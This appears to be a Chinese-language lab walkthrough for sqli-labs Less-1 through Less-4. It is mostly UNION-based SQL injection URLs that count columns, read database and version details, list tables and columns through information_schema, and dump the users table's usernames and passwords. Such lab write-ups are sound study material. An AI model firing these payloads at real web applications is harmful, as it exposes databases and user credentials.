目录
1.less-1 基于错误的GET单引号字符型注入
1.1判断注入点
1.2猜字段数
1.3判断显示位
1.4信息搜集
1.5数据收集
1.5.1爆破表名
1.5.2爆破列名
1.5.3爆破users表
2.less-2基于错误的GET整形注入
2.1注入点判断
3.less-3基于错误的GET单引号变形字符型注入
3.1注入点的判断
4.less-4基于错误的GET双引号字符型注入
4.1注入点判断
/sqli-labs-master/Less-1/?id=1'
/sqli-labs-master/Less-1/?id=1' order by 1 --+
/sqli-labs-master/Less-1/?id=1' order by 2 --+
/sqli-labs-master/Less-1/?id=1' order by 3 --+
/sqli-labs-master/Less-1/?id=1' order by 4 --+
可以得到有3个字段。
-++是为了注释掉后面的内容,相当于#,?id=1'的作用是让这个字段错误,然后让系统执行union后面的字段。
/sqli-labs-master/Less-1/?id=1'and 1=2 union select 1,2,3 --+
或者/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
这里and 1=2或者负号的作用是让union前面的字段错误,然后执行union后面的字段。
database:security
version:5.5.53
user:root@lacalhost
version_compile_os:win32
/sqli-labs-master/Less-1/?id=1'and 1=2 union select 1,database(),version() --+
/sqli-labs-master/Less-1/?id=-1' union select 1,user(),@@version_compile_os --+
版本为5.5.53,存在information_schema数据库。
/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' --+
(数据库security包含的全部列名)
/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
(user表包含的列名)
爆破users表中的用户名username和密码password
/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
所以不加单引号即为整形。
/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3 --+
//注意:所有符号必须在英文状态下输入,因为MySQL只支持英文符号。
其余注入内容和第一题类似。
/sqli-labs-master/Less-3/?id=1')
/sqli-labs-master/Less-3/?id=1')%20 and 1=2 union select 1,2,3 --+
其余注入步骤如less-1
/sqli-labs-master/Less-4/?id=1")and 1=2 union select 1,2,3 --+
其余步骤和less-1一样,结果也一样。